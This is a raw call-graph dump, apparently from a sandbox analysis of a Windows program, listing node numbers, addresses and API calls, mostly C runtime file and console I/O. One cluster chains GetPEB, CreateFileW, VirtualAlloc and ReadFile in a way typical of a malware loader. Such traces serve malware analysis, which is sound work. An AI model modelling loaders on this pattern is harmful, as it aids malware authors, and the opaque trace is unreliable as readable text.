ea11a1 98576->98579 98577 ea128a 98580 ea1303 ReadFile 98577->98580 98586 ea12a0 GetConsoleMode 98577->98586 98662 ea1b11 60 API calls 3 library calls 98578->98662 98660 e98d68 58 API calls __getptd_noexit 98579->98660 98583 ea17e3 GetLastError 98580->98583 98584 ea1325 98580->98584 98587 ea17f0 98583->98587 98588 ea12e3 98583->98588 98584->98583 98593 ea12f5 98584->98593 98585 ea11a6 98661 e98d34 58 API calls __getptd_noexit 98585->98661 98590 ea1300 98586->98590 98591 ea12b4 98586->98591 98668 e98d68 58 API calls __getptd_noexit 98587->98668 98601 ea12e9 98588->98601 98663 e98d47 58 API calls 3 library calls 98588->98663 98590->98580 98591->98590 98594 ea12ba ReadConsoleW 98591->98594 98593->98601 98603 ea135a 98593->98603 98609 ea15c7 98593->98609 98594->98593 98596 ea12dd GetLastError 98594->98596 98595 ea17f5 98669 e98d34 58 API calls __getptd_noexit 98595->98669 98596->98588 98599->98537 98600 e92f95 _free 58 API calls 98600->98599 98601->98599 98601->98600 98604 ea13c6 ReadFile 98603->98604 98612 ea1447 98603->98612 98605 ea13e7 GetLastError 98604->98605 98618 ea13f1 98604->98618 98605->98618 98606 ea1504 98613 ea14b4 MultiByteToWideChar 98606->98613 98666 ea1b11 60 API calls 3 library calls 98606->98666 98607 ea14f4 98665 e98d68 58 API calls __getptd_noexit 98607->98665 98608 ea16cd ReadFile 98611 ea16f0 GetLastError 98608->98611 98617 ea16fe 98608->98617 98609->98601 98609->98608 98611->98617 98612->98601 98612->98606 98612->98607 98612->98613 98613->98596 98613->98601 98617->98609 98667 ea1b11 60 API calls 3 library calls 98617->98667 98618->98603 98664 ea1b11 60 API calls 3 library calls 98618->98664 98620 ea0e02 98619->98620 98624 ea0e17 98619->98624 98706 e98d68 58 API calls __getptd_noexit 98620->98706 98622 ea0e07 98707 e98ff6 9 API calls __wopenfile 98622->98707 98625 ea0e4c 98624->98625 98631 ea0e12 98624->98631 98708 ea6234 58 API calls __malloc_crt 98624->98708 98627 e94916 __flush 58 API calls 98625->98627 98628 ea0e60 98627->98628 98673 ea0f97 98628->98673 98630 ea0e67 98630->98631 98632 e94916 __flush 58 API calls 98630->98632 98631->98537 98633 ea0e8a 98632->98633 98633->98631 98634 e94916 __flush 58 API calls 98633->98634 98635 ea0e96 98634->98635 98635->98631 98636 e94916 __flush 58 API calls 98635->98636 98637 ea0ea3 98636->98637 98638 e94916 __flush 58 API calls 98637->98638 98638->98631 98639->98531 98640->98540 98641->98537 98642->98531 98643->98548 98644->98550 98646 ea5ec6 98645->98646 98648 ea5ed3 98645->98648 98647 e98d68 __wopenfile 58 API calls 98646->98647 98650 ea5ecb 98647->98650 98649 e98d68 __wopenfile 58 API calls 98648->98649 98651 ea5edf 98648->98651 98652 ea5f00 98649->98652 98650->98577 98651->98577 98653 e98ff6 __wopenfile 9 API calls 98652->98653 98653->98650 98654->98556 98655->98599 98656->98565 98657->98564 98658->98565 98659->98576 98660->98585 98661->98599 98662->98575 98663->98601 98664->98618 98665->98601 98666->98613 98667->98617 98668->98595 98669->98601 98670->98560 98671->98564 98672->98599 98674 ea0fa3 __ioinit 98673->98674 98675 ea0fb0 98674->98675 98676 ea0fc7 98674->98676 98677 e98d34 __free_osfhnd 58 API calls 98675->98677 98678 ea108b 98676->98678 98679 ea0fdb 98676->98679 98681 ea0fb5 98677->98681 98680 e98d34 __free_osfhnd 58 API calls 98678->98680 98682 ea0ff9 98679->98682 98683 ea1006 98679->98683 98684 ea0ffe 98680->98684 98685 e98d68 __wopenfile 58 API calls 98681->98685 98686 e98d34 __free_osfhnd 58 API calls 98682->98686 98687 ea1028 98683->98687 98688 ea1013 98683->98688 98692 e98d68 __wopenfile 58 API calls 98684->98692 98689 ea0fbc __ioinit 98685->98689 98686->98684 98691 e9d446 ___lock_fhandle 59 API calls 98687->98691 98690 e98d34 __free_osfhnd 58 API calls 98688->98690 98689->98630 98693 ea1018 98690->98693 98694 ea102e 98691->98694 98699 ea1020 98692->98699 98695 e98d68 __wopenfile 58 API calls 98693->98695 98696 ea1041 98694->98696 98697 ea1054 98694->98697 98695->98699 98700 ea10ab __read_nolock 70 API calls 98696->98700 98698 e98d68 __wopenfile 58 API calls 98697->98698 98702 ea1059 98698->98702 98701 e98ff6 __wopenfile 9 API calls 98699->98701 98703 ea104d 98700->98703 98701->98689 98704 e98d34 __free_osfhnd 58 API calls 98702->98704 98705 ea1083 __read LeaveCriticalSection 98703->98705 98704->98703 98705->98689 98706->98622 98707->98631 98708->98625 98710 e95e9c __ioinit 98709->98710 98711 e95eae 98710->98711 98712 e95ec3 98710->98712 98723 e98d68 58 API calls __getptd_noexit 98711->98723 98714 e96e4e __lock_file 59 API calls 98712->98714 98716 e95ec9 98714->98716 98715 e95eb3 98724 e98ff6 9 API calls __wopenfile 98715->98724 98725 e95b00 67 API calls 6 library calls 98716->98725 98719 e95ed4 98726 e95ef4 LeaveCriticalSection LeaveCriticalSection _fseek 98719->98726 98721 e95ee6 98722 e95ebe __ioinit 98721->98722 98722->98306 98723->98715 98724->98722 98725->98719 98726->98721 98727->98172 98728->98186 98729->98189 98730->98185 98731->98194 98733 e792c9 Mailbox 98732->98733 98734 eaf5c8 98733->98734 98739 e792d3 98733->98739 98735 e90ff6 Mailbox 59 API calls 98734->98735 98737 eaf5d4 98735->98737 98736 e792da 98736->98198 98739->98736 98740 e79df0 59 API calls Mailbox 98739->98740 98740->98739 98741->98209 98742->98204 98743->98214 98744->98232 98746 ed8d9b 98745->98746 98747 ed8da9 98745->98747 98748 e9548b 115 API calls 98746->98748 98749 ed8dee 98747->98749 98750 e9548b 115 API calls 98747->98750 98775 ed8db2 98747->98775 98748->98747 98776 ed901b 98749->98776 98751 ed8dd3 98750->98751 98751->98749 98753 ed8ddc 98751->98753 98757 e955d6 __fcloseall 83 API calls 98753->98757 98753->98775 98754 ed8e32 98755 ed8e57 98754->98755 98756 ed8e36 98754->98756 98780 ed8c33 98755->98780 98759 ed8e43 98756->98759 98760 e955d6 __fcloseall 83 API calls 98756->98760 98757->98775 98762 e955d6 __fcloseall 83 API calls 98759->98762 98759->98775 98760->98759 98762->98775 98763 ed8e85 98789 ed8eb5 98763->98789 98764 ed8e65 98766 ed8e72 98764->98766 98768 e955d6 __fcloseall 83 API calls 98764->98768 98769 e955d6 __fcloseall 83 API calls 98766->98769 98766->98775 98768->98766 98769->98775 98772 ed8ea0 98774 e955d6 __fcloseall 83 API calls 98772->98774 98772->98775 98774->98775 98775->98244 98777 ed9040 98776->98777 98779 ed9029 __tzset_nolock _memmove 98776->98779 98778 e95812 __fread_nolock 74 API calls 98777->98778 98778->98779 98779->98754 98781 e9594c _W_store_winword 58 API calls 98780->98781 98782 ed8c42 98781->98782 98783 e9594c _W_store_winword 58 API calls 98782->98783 98784 ed8c56 98783->98784 98785 e9594c _W_store_winword 58 API calls 98784->98785 98786 ed8c6a 98785->98786 98787 ed8f97 58 API calls 98786->98787 98788 ed8c7d 98786->98788 98787->98788 98788->98763 98788->98764 98793 ed8eca 98789->98793 98790 ed8f82 98822 ed91bf 98790->98822 98792 ed8c8f 74 API calls 98792->98793 98793->98790 98793->98792 98796 ed8e8c 98793->98796 98818 ed909c 98793->98818 98826 ed8d2b 74 API calls 98793->98826 98797 ed8f97 98796->98797 98798 ed8faa 98797->98798 98799 ed8fa4 98797->98799 98801 e92f95 _free 58 API calls 98798->98801 98803 ed8fbb 98798->98803 98800 e92f95 _free 58 API calls 98799->98800 98800->98798 98801->98803 98802 ed8e93 98802->98772 98805 e955d6 98802->98805 98803->98802 98804 e92f95 _free 58 API calls 98803->98804 98804->98802 98806 e955e2 __ioinit 98805->98806 98807 e9560e 98806->98807 98808 e955f6 98806->98808 98810 e96e4e __lock_file 59 API calls 98807->98810 98817 e95606 __ioinit 98807->98817 98875 e98d68 58 API calls __getptd_noexit 98808->98875 98812 e95620 98810->98812 98811 e955fb 98876 e98ff6 9 API calls __wopenfile 98811->98876 98859 e9556a 98812->98859 98817->98772 98820 ed90ab 98818->98820 98821 ed90eb 98818->98821 98820->98793 98821->98820 98827 ed9172 98821->98827 98823 ed91cc 98822->98823 98824 ed91dd 98822->98824 98825 e94a93 80 API calls 98823->98825 98824->98796 98825->98824 98826->98793 98828 ed919e 98827->98828 98829 ed91af 98827->98829 98831 e94a93 98828->98831 98829->98821 98832 e94a9f __ioinit 98831->98832 98833 e94abd 98832->98833 98834 e94ad5 98832->98834 98836 e94acd __ioinit 98832->98836 98856 e98d68 58 API calls __getptd_noexit 98833->98856 98837 e96e4e __lock_file 59 API calls 98834->98837 98836->98829 98839 e94adb 98837->98839 98838 e94ac2 98857 e98ff6 9 API calls __wopenfile 98838->98857 98844 e9493a 98839->98844 98847 e94949 98844->98847 98851 e94967 98844->98851 98845 e94957 98846 e98d68 __wopenfile 58 API calls 98845->98846 98848 e9495c 98846->98848 98847->98845 98847->98851 98854 e94981 _memmove 98847->98854 98849 e98ff6 __wopenfile 9 API calls 98848->98849 98849->98851 98850 e9b05e __flsbuf 78 API calls 98850->98854 98858 e94b0d LeaveCriticalSection LeaveCriticalSection _fseek 98851->98858 98852 e94c6d __flush 78 API calls 98852->98854 98853 e94916 __flush 58 API calls 98853->98854 98854->98850 98854->98851 98854->98852 98854->98853 98855 e9dac6 __write 78 API calls 98854->98855 98855->98854 98856->98838 98857->98836 98858->98836 98860 e95579 98859->98860 98861 e9558d 98859->98861 98914 e98d68 58 API calls __getptd_noexit 98860->98914 98863 e95589 98861->98863 98878 e94c6d 98861->98878 98877 e95645 LeaveCriticalSection LeaveCriticalSection _fseek 98863->98877 98864 e9557e 98915 e98ff6 9 API calls __wopenfile 98864->98915 98870 e94916 __flush 58 API calls 98871 e955a7 98870->98871 98888 ea0c52 98871->98888 98873 e955ad 98873->98863 98874 e92f95 _free 58 API calls 98873->98874 98874->98863 98875->98811 98876->98817 98877->98817 98879 e94c80 98878->98879 98883 e94ca4 98878->98883 98880 e94916 __flush 58 API calls 98879->98880 98879->98883 98881 e94c9d 98880->98881 98916 e9dac6 98881->98916 98884 ea0dc7 98883->98884 98885 ea0dd4 98884->98885 98887 e955a1 98884->98887 98886 e92f95 _free 58 API calls 98885->98886 98885->98887 98886->98887 98887->98870 98889 ea0c5e __ioinit 98888->98889 98890 ea0c6b 98889->98890 98891 ea0c82 98889->98891 99041 e98d34 58 API calls __getptd_noexit 98890->99041 98893 ea0d0d 98891->98893 98895 ea0c92 98891->98895 99046 e98d34 58 API calls __getptd_noexit 98893->99046 98894 ea0c70 99042 e98d68 58 API calls __getptd_noexit 98894->99042 98898 ea0cba 98895->98898 98899 ea0cb0 98895->98899 98903 e9d446 ___lock_fhandle 59 API calls 98898->98903 99043 e98d34 58 API calls __getptd_noexit 98899->99043 98900 ea0cb5 99047 e98d68 58 API calls __getptd_noexit 98900->99047 98901 ea0c77 __ioinit 98901->98873 98905 ea0cc0 98903->98905 98907 ea0cde 98905->98907 98908 ea0cd3 98905->98908 98906 ea0d19 99048 e98ff6 9 API calls __wopenfile 98906->99048 99044 e98d68 58 API calls __getptd_noexit 98907->99044 99026 ea0d2d 98908->99026 98912 ea0cd9 99045 ea0d05 LeaveCriticalSection __unlock_fhandle 98912->99045 98914->98864 98915->98863 98917 e9dad2 __ioinit 98916->98917 98918 e9dadf 98917->98918 98919 e9daf6 98917->98919 99017 e98d34 58 API calls __getptd_noexit 98918->99017 98921 e9db95 98919->98921 98923 e9db0a 98919->98923 99023 e98d34 58 API calls __getptd_noexit 98921->99023 98922 e9dae4 99018 e98d68 58 API calls __getptd_noexit 98922->99018 98926 e9db28 98923->98926 98927 e9db32 98923->98927 99019 e98d34 58 API calls __getptd_noexit 98926->99019 98944 e9d446 98927->98944 98928 e9db2d 99024 e98d68 58 API calls __getptd_noexit 98928->99024 98931 e9db38 98933 e9db4b 98931->98933 98934 e9db5e 98931->98934 98953 e9dbb5 98933->98953 99020 e98d68 58 API calls __getptd_noexit 98934->99020 98935 e9dba1 99025 e98ff6 9 API calls __wopenfile 98935->99025 98939 e9daeb __ioinit 98939->98883 98940 e9db57 99022 e9db8d LeaveCriticalSection __unlock_fhandle 98940->99022 98941 e9db63 99021 e98d34 58 API calls __getptd_noexit 98941->99021 98945 e9d452 __ioinit 98944->98945 98946 e9d4a1 EnterCriticalSection 98945->98946 98948 e99e4b __lock 58 API calls 98945->98948 98947 e9d4c7 __ioinit 98946->98947 98947->98931 98949 e9d477 98948->98949 98950 e9d48f 98949->98950 98951 e9a06b __mtinitlocks InitializeCriticalSectionAndSpinCount 98949->98951 98952 e9d4cb ___lock_fhandle LeaveCriticalSection 98950->98952 98951->98950 98952->98946 98954 e9dbc2 __ftell_nolock 98953->98954 98955 e9dc01 98954->98955 98956 e9dc20 98954->98956 98981 e9dbf6 98954->98981 98958 e98d34 __free_osfhnd 58 API calls 98955->98958 98959 e9dc78 98956->98959 98960 e9dc5c 98956->98960 98957 e9c836 __woutput_l 6 API calls 98961 e9e416 98957->98961 98962 e9dc06 98958->98962 98964 e9dc91 98959->98964 98967 ea1b11 __lseeki64_nolock 60 API calls 98959->98967 98963 e98d34 __free_osfhnd 58 API calls 98960->98963 98961->98940 98965 e98d68 __wopenfile 58 API calls 98962->98965 98966 e9dc61 98963->98966 98969 ea5ebb __flswbuf 58 API calls 98964->98969 98968 e9dc0d 98965->98968 98971 e98d68 __wopenfile 58 API calls 98966->98971 98967->98964 98972 e98ff6 __wopenfile 9 API calls 98968->98972 98970 e9dc9f 98969->98970 98973 e9dff8 98970->98973 98978 e99bec _wcstok 58 API calls 98970->98978 98974 e9dc68 98971->98974 98972->98981 98975 e9e38b WriteFile 98973->98975 98976 e9e016 98973->98976 98977 e98ff6 __wopenfile 9 API calls 98974->98977 98979 e9dfeb GetLastError 98975->98979 98985 e9dfb8 98975->98985 98980 e9e13a 98976->98980 98988 e9e02c 98976->98988 98977->98981 98982 e9dccb GetConsoleMode 98978->98982 98979->98985 98991 e9e22f 98980->98991 98993 e9e145 98980->98993 98981->98957 98982->98973 98984 e9dd0a 98982->98984 98983 e9e3c4 98983->98981 98989 e98d68 __wopenfile 58 API calls 98983->98989 98984->98973 98986 e9dd1a GetConsoleCP 98984->98986 98985->98981 98985->98983 98990 e9e118 98985->98990 98986->98983 99013 e9dd49 98986->99013 98987 e9e09b WriteFile 98987->98979 98992 e9e0d8 98987->98992 98988->98983 98988->98987 98994 e9e3f2 98989->98994 98996 e9e3bb 98990->98996 98997 e9e123 98990->98997 98991->98983 98998 e9e2a4 WideCharToMultiByte 98991->98998 98992->98988 98999 e9e0fc 98992->98999 98993->98983 99000 e9e1aa WriteFile 98993->99000 98995 e98d34 __free_osfhnd 58 API calls 98994->98995 98995->98981 99003 e98d47 __dosmaperr 58 API calls 98996->99003 99002 e98d68 __wopenfile 58 API calls 98997->99002 98998->98979 99009 e9e2eb 98998->99009 98999->98985 99000->98979 99001 e9e1f9 99000->99001 99001->98985 99001->98993 99001->98999 99004 e9e128 99002->99004 99003->98981 99006 e98d34 __free_osfhnd 58 API calls 99004->99006 99005 e9e2f3 WriteFile 99008 e9e346 GetLastError 99005->99008 99005->99009 99006->98981 99007 e93835 __write_nolock 58 API calls 99007->99013 99008->99009 99009->98985 99009->98991 99009->98999 99009->99005 99010 ea650a 60 API calls __write_nolock 99010->99013 99011 e9de32 WideCharToMultiByte 99011->98985 99012 e9de6d WriteFile 99011->99012 99012->98979 99015 e9de9f 99012->99015 99013->98985 99013->99007 99013->99010 99013->99011 99013->99015 99014 ea7cae WriteConsoleW CreateFileW __putwch_nolock 99014->99015 99015->98979 99015->98985 99015->99013 99015->99014 99016 e9dec7 WriteFile 99015->99016 99016->98979 99016->99015 99017->98922 99018->98939 99019->98928 99020->98941 99021->98940 99022->98939 99023->98928 99024->98935 99025->98939 99049 e9d703 99026->99049 99028 ea0d91 99062 e9d67d 59 API calls 2 library calls 99028->99062 99030 ea0d3b 99030->99028 99031 e9d703 __lseeki64_nolock 58 API calls 99030->99031 99040 ea0d6f 99030->99040 99035 ea0d66 99031->99035 99032 e9d703 __lseeki64_nolock 58 API calls 99036 ea0d7b FindCloseChangeNotification 99032->99036 99033 ea0dbb 99033->98912 99034 ea0d99 99034->99033 99063 e98d47 58 API calls 3 library calls 99034->99063 99038 e9d703 __lseeki64_nolock 58 API calls 99035->99038 99036->99028 99039 ea0d87 GetLastError 99036->99039 99038->99040 99039->99028 99040->99028 99040->99032 99041->98894 99042->98901 99043->98900 99044->98912 99045->98901 99046->98900 99047->98906 99048->98901 99050 e9d70e 99049->99050 99051 e9d723 99049->99051 99052 e98d34 __free_osfhnd 58 API calls 99050->99052 99054 e98d34 __free_osfhnd 58 API calls 99051->99054 99057 e9d748 99051->99057 99053 e9d713 99052->99053 99056 e98d68 __wopenfile 58 API calls 99053->99056 99055 e9d752 99054->99055 99058 e98d68 __wopenfile 58 API calls 99055->99058 99059 e9d71b 99056->99059 99057->99030 99060 e9d75a 99058->99060 99059->99030 99061 e98ff6 __wopenfile 9 API calls 99060->99061 99061->99059 99062->99034 99063->99033 99126 ea1b90 99064->99126 99067 e748f7 99128 e77eec 99067->99128 99068 e748da 99069 e77d2c 59 API calls 99068->99069 99071 e748e6 99069->99071 99072 e77886 59 API calls 99071->99072 99073 e748f2 99072->99073 99074 e909d5 99073->99074 99075 ea1b90 __ftell_nolock 99074->99075 99076 e909e2 GetLongPathNameW 99075->99076 99077 e77d2c 59 API calls 99076->99077 99078 e7741d 99077->99078 99079 e7716b 99078->99079 99080 e777c7 59 API calls 99079->99080 99081 e7717d 99080->99081 99082 e748ae 60 API calls 99081->99082 99083 e77188 99082->99083 99084 e77193 99083->99084 99089 eaecae 99083->99089 99085 e73f84 59 API calls 99084->99085 99087 e7719f 99085->99087 99132 e734c2 99087->99132 99091 eaecc8 99089->99091 99138 e77a68 61 API calls 99089->99138 99090 e771b2 Mailbox 99090->98011 99093 e74f3d 136 API calls 99092->99093 99094 e769ef 99093->99094 99095 eae45a 99094->99095 99096 e74f3d 136 API calls 99094->99096 99097 ed97e5 122 API calls 99095->99097 99098 e76a03 99096->99098 99099 eae46f 99097->99099 99098->99095 99102 e76a0b 99098->99102 99100 eae473 99099->99100 99101 eae490 99099->99101 99103 e74faa 84 API calls 99100->99103 99104 e90ff6 Mailbox 59 API calls 99101->99104 99105 e76a17 99102->99105 99106 eae47b 99102->99106 99103->99106 99125 eae4d5 Mailbox 99104->99125 99139 e76bec 99105->99139 99232 ed4534 90 API calls _wprintf 99106->99232 99109 eae489 99109->99101 99111 eae689 99112 e92f95 _free 58 API calls 99111->99112 99113 eae691 99112->99113 99114 e74faa 84 API calls 99113->99114 99119 eae69a 99114->99119 99118 e92f95 _free 58 API calls 99118->99119 99119->99118 99121 e74faa 84 API calls 99119->99121 99238 ecfcb1 89 API calls 4 library calls 99119->99238 99121->99119 99122 e77f41 59 API calls 99122->99125 99125->99111 99125->99119 99125->99122 99233 ecfc4d 59 API calls 2 library calls 99125->99233 99234 ecfb6e 61 API calls 2 library calls 99125->99234 99235 ed7621 59 API calls Mailbox 99125->99235 99236 e7766f 59 API calls 2 library calls 99125->99236 99237 e774bd 59 API calls Mailbox 99125->99237 99127 e748bb GetFullPathNameW 99126->99127 99127->99067 99127->99068 99129 e77f06 99128->99129 99130 e77ef9 99128->99130 99131 e90ff6 Mailbox 59 API calls 99129->99131 99130->99071 99131->99130 99133 e734d4 99132->99133 99137 e734f3 _memmove 99132->99137 99135 e90ff6 Mailbox 59 API calls 99133->99135 99134 e90ff6 Mailbox 59 API calls 99136 e7350a 99134->99136 99135->99137 99136->99090 99137->99134 99138->99089 99140 e76c15 99139->99140 99141 eae847 99139->99141 99244 e75906 60 API calls Mailbox 99140->99244 99330 ecfcb1 89 API calls 4 library calls 99141->99330 99144 eae85a 99331 ecfcb1 89 API calls 4 library calls 99144->99331 99145 e76c37 99245 e75956 99145->99245 99148 e76c54 99150 e777c7 59 API calls 99148->99150 99152 e76c60 99150->99152 99151 eae876 99154 e76cc1 99151->99154 99258 e90b9b 60 API calls __ftell_nolock 99152->99258 99156 eae889 99154->99156 99157 e76ccf 99154->99157 99155 e76c6c 99158 e777c7 59 API calls 99155->99158 99159 e75dcf CloseHandle 99156->99159 99160 e777c7 59 API calls 99157->99160 99161 e76c78 99158->99161 99162 eae895 99159->99162 99163 e76cd8 99160->99163 99165 e748ae 60 API calls 99161->99165 99166 e74f3d 136 API calls 99162->99166 99164 e777c7 59 API calls 99163->99164 99167 e76ce1 99164->99167 99168 e76c86 99165->99168 99169 eae8b1 99166->99169 99268 e746f9 99167->99268 99259 e759b0 ReadFile SetFilePointerEx 99168->99259 99172 eae8da 99169->99172 99173 ed97e5 122 API calls 99169->99173 99332 ecfcb1 89 API calls 4 library calls 99172->99332 99177 eae8cd 99173->99177 99176 e76cb2 99260 e75c4e 99176->99260 99181 eae8f6 99177->99181 99182 eae8d5 99177->99182 99179 eae8f1 99187 e76e6c Mailbox 99179->99187 99185 e74faa 84 API calls 99181->99185 99184 e74faa 84 API calls 99182->99184 99184->99172 99186 eae8fb 99185->99186 99188 e90ff6 Mailbox 59 API calls 99186->99188 99239 e75934 99187->99239 99195 eae92f 99188->99195 99192 e73bcd 99192->97870 99192->97879 99333 e7766f 59 API calls 2 library calls 99195->99333 99199 eaeb69 99339 ed7581 59 API calls Mailbox 99199->99339 99205 eaeb8b 99340 edf835 59 API calls 2 library calls 99205->99340 99208 eaeb98 99222 e77f41 59 API calls 99228 eae978 Mailbox 99222->99228 99226 eaebbb 99341 ecfcb1 89 API calls 4 library calls 99226->99341 99228->99199 99228->99222 99228->99226 99334 ecfc4d 59 API calls 2 library calls 99228->99334 99335 ecfb6e 61 API calls 2 library calls 99228->99335 99336 ed7621 59 API calls Mailbox 99228->99336 99337 e7766f 59 API calls 2 library calls 99228->99337 99338 e77373 59 API calls Mailbox 99228->99338 99229 eaebd4 99230 e92f95 _free 58 API calls 99229->99230 99231 eaebe7 99230->99231 99231->99187 99232->99109 99233->99125 99234->99125 99235->99125 99236->99125 99237->99125 99238->99119 99240 e75dcf CloseHandle 99239->99240 99241 e7593c Mailbox 99240->99241 99242 e75dcf CloseHandle 99241->99242 99243 e7594b 99242->99243 99243->99192 99244->99145 99246 e75dcf CloseHandle 99245->99246 99247 e75962 99246->99247 99344 e75df9 99247->99344 99249 e759a4 99249->99144 99249->99148 99250 e75981 99250->99249 99352 e75770 99250->99352 99252 e75993 99369 e753db SetFilePointerEx SetFilePointerEx 99252->99369 99254 e7599a 99254->99249 99255 eae030 99254->99255 99370 ed3696 SetFilePointerEx SetFilePointerEx WriteFile 99255->99370 99257 eae060 99257->99249 99258->99155 99259->99176 99261 e75c68 99260->99261 99262 e75cef SetFilePointerEx 99261->99262 99263 eae151 99261->99263 99267 e75cc3 99261->99267 99267->99154 99269 e777c7 59 API calls 99268->99269 99270 e7470f 99269->99270 99271 e777c7 59 API calls 99270->99271 99272 e74717 99271->99272 99273 e777c7 59 API calls 99272->99273 99274 e7471f 99273->99274 99275 e777c7 59 API calls 99274->99275 99276 e74727 99275->99276 99277 ead8fb 99276->99277 99278 e7475b 99276->99278 99279 e781a7 59 API calls 99277->99279 99280 e779ab 59 API calls 99278->99280 99281 ead904 99279->99281 99282 e74769 99280->99282 99283 e77eec 59 API calls 99281->99283 99284 e77e8c 59 API calls 99282->99284 99285 e7479e 99283->99285 99286 e74773 99284->99286 99286->99285 99330->99144 99331->99151 99332->99179 99333->99228 99334->99228 99335->99228 99336->99228 99337->99228 99338->99228 99339->99205 99340->99208 99341->99229 99345 e75e12 CreateFileW 99344->99345 99346 eae181 99344->99346 99347 e75e34 99345->99347 99346->99347 99348 eae187 CreateFileW 99346->99348 99347->99250 99348->99347 99349 eae1ad 99348->99349 99350 e75c4e 2 API calls 99349->99350 99351 eae1b8 99350->99351 99351->99347 99353 eadfce 99352->99353 99354 e7578b 99352->99354 99368 e7581a 99353->99368 99377 e75e3f 99353->99377 99355 e75c4e 2 API calls 99354->99355 99354->99368 99356 e757ad 99355->99356 99357 e7538e 59 API calls 99356->99357 99359 e757b7 99357->99359 99359->99353 99360 e757c4 99359->99360 99361 e90ff6 Mailbox 59 API calls 99360->99361 99362 e757cf 99361->99362 99363 e7538e 59 API calls 99362->99363 99364 e757da 99363->99364 99371 e75d20 99364->99371 99367 e75c4e 2 API calls 99367->99368 99368->99252 99369->99254 99370->99257 99372 e75d93 99371->99372 99376 e75d2e 99371->99376 99382 e75dae SetFilePointerEx 99372->99382 99374 e75807 99374->99367 99375 e75d66 ReadFile 99375->99374 99375->99376 99376->99374 99376->99375 99378 e75c4e 2 API calls 99377->99378 99379 e75e60 99378->99379 99380 e75c4e 2 API calls 99379->99380 99381 e75e74 99380->99381 99381->99368 99382->99376 99953 e7107d 99958 e771eb 99953->99958 99955 e7108c 99956 e92f80 __cinit 67 API calls 99955->99956 99957 e71096 99956->99957 99959 e771fb __ftell_nolock 99958->99959 99960 e777c7 59 API calls 99959->99960 99961 e772b1 99960->99961 99962 e74864 61 API calls 99961->99962 99963 e772ba 99962->99963 99989 e9074f 99963->99989 99966 e77e0b 59 API calls 99967 e772d3 99966->99967 99968 e73f84 59 API calls 99967->99968 99969 e772e2 99968->99969 99970 e777c7 59 API calls 99969->99970 99971 e772eb 99970->99971 99972 e77eec 59 API calls 99971->99972 99973 e772f4 RegOpenKeyExW 99972->99973 99974 eaecda RegQueryValueExW 99973->99974 99978 e77316 Mailbox 99973->99978 99975 eaed6c RegCloseKey 99974->99975 99976 eaecf7 99974->99976 99975->99978 99982 eaed7e _wcscat Mailbox __NMSG_WRITE 99975->99982 99977 e90ff6 Mailbox 59 API calls 99976->99977 99979 eaed10 99977->99979 99978->99955 99981 e7538e 59 API calls 99979->99981 99980 e77b52 59 API calls 99980->99982 99983 eaed1b RegQueryValueExW 99981->99983 99982->99978 99982->99980 99987 e77f41 59 API calls 99982->99987 99988 e73f84 59 API calls 99982->99988 99984 eaed38 99983->99984 99986 eaed52 99983->99986 99985 e77d2c 59 API calls 99984->99985 99985->99986 99986->99975 99987->99982 99988->99982 99990 ea1b90 __ftell_nolock 99989->99990 99991 e9075c GetFullPathNameW 99990->99991 99992 e9077e 99991->99992 99993 e77d2c 59 API calls 99992->99993 99994 e772c5 99993->99994 99994->99966 99995 17129bb 99996 17129c0 99995->99996 99997 1710000 GetPEB 99996->99997 99998 17129cc 99997->99998 99999 1712a80 99998->99999 100000 17129ea 99998->100000 100017 1713330 9 API calls 99999->100017 100004 1712690 100000->100004 100003 1712a67 100005 1710000 GetPEB 100004->100005 100008 171272f 100005->100008 100007 1712760 CreateFileW 100007->100008 100009 171276d 100007->100009 100008->100009 100010 1712789 VirtualAlloc 100008->100010 100015 1712890 FindCloseChangeNotification 100008->100015 100016 17128a0 VirtualFree 100008->100016 100018 17135a0 GetPEB 100008->100018 100012 171298a 100009->100012 100013 171297c VirtualFree 100009->100013 100010->100009 100011 17127aa ReadFile 100010->100011 100011->100009 100014 17127c8 VirtualAlloc 100011->100014 100012->100003 100013->100012 100014->100008 100014->100009 100015->100008 100016->100008 100017->100003 100019 17135ca 100018->100019 100019->100007 100020 eaff06 100021 eaff10 100020->100021 100060 e7ac90 Mailbox _memmove 100020->100060 100275 e78e34 59 API calls Mailbox 100021->100275 100025 e90ff6 59 API calls Mailbox 100044 e7a097 Mailbox 100025->100044 100028 e7b5d5 100030 e781a7 59 API calls 100028->100030 100039 e7a1b7 100030->100039 100031 eb047f 100279 eda0b5 89 API calls 4 library calls 100031->100279 100034 e777c7 59 API calls 100034->100044 100036 e781a7 59 API calls 100036->100044 100037 e77f41 59 API calls 100037->100060 100038 eb048e 100040 ec7405 59 API calls 100040->100044 100042 ec66f4 Mailbox 59 API calls 100042->100039 100043 eb0e00 100284 eda0b5 89 API calls 4 library calls 100043->100284 100044->100025 100044->100028 100044->100031 100044->100034 100044->100036 100044->100039 100044->100040 100044->100043 100045 e92f80 67 API calls __cinit 100044->100045 100047 e7b5da 100044->100047 100049 e7a6ba 100044->100049 100269 e7ca20 341 API calls 2 library calls 100044->100269 100270 e7ba60 60 API calls Mailbox 100044->100270 100045->100044 100285 eda0b5 89 API calls 4 library calls 100047->100285 100048 eebf80 341 API calls 100048->100060 100283 eda0b5 89 API calls 4 library calls 100049->100283 100051 e7b416 100274 e7f803 341 API calls 100051->100274 100053 e7a000 341 API calls 100053->100060 100054 eb0c94 100281 e79df0 59 API calls Mailbox 100054->100281 100056 eb0ca2 100282 eda0b5 89 API calls 4 library calls 100056->100282 100058 eb0c86 100058->100039 100058->100042 100059 e7b37c 100272 e79e9c 60 API calls Mailbox 100059->100272 100060->100037 100060->100039 100060->100044 100060->100048 100060->100051 100060->100053 100060->100054 100060->100056 100060->100059 100061 e90ff6 59 API calls Mailbox 100060->100061 100066 e7b685 100060->100066 100069 e7ade2 Mailbox 100060->100069 100228 eec5f4 100060->100228 100260 ed7be0 100060->100260 100266 ec66f4 100060->100266 100276 ec7405 59 API calls 100060->100276 100277 eec4a7 85 API calls 2 library calls 100060->100277 100061->100060 100063 e7b38d 100273 e79e9c 60 API calls Mailbox 100063->100273 100280 eda0b5 89 API calls 4 library calls 100066->100280 100069->100039 100069->100058 100069->100066 100070 eb00e0 VariantClear 100069->100070 100077 ef251d 100069->100077 100082 edd2e5 100069->100082 100129 ee474d 100069->100129 100138 e82123 100069->100138 100178 eee237 100069->100178 100181 edd2e6 100069->100181 100271 e79df0 59 API calls Mailbox 100069->100271 100278 ec7405 59 API calls 100069->100278 100070->100069 100286 ecf8f2 100077->100286 100079 ef2529 100305 e79b9c 59 API calls Mailbox 100079->100305 100081 ef2545 Mailbox 100081->100069 100083 edd305 100082->100083 100084 edd310 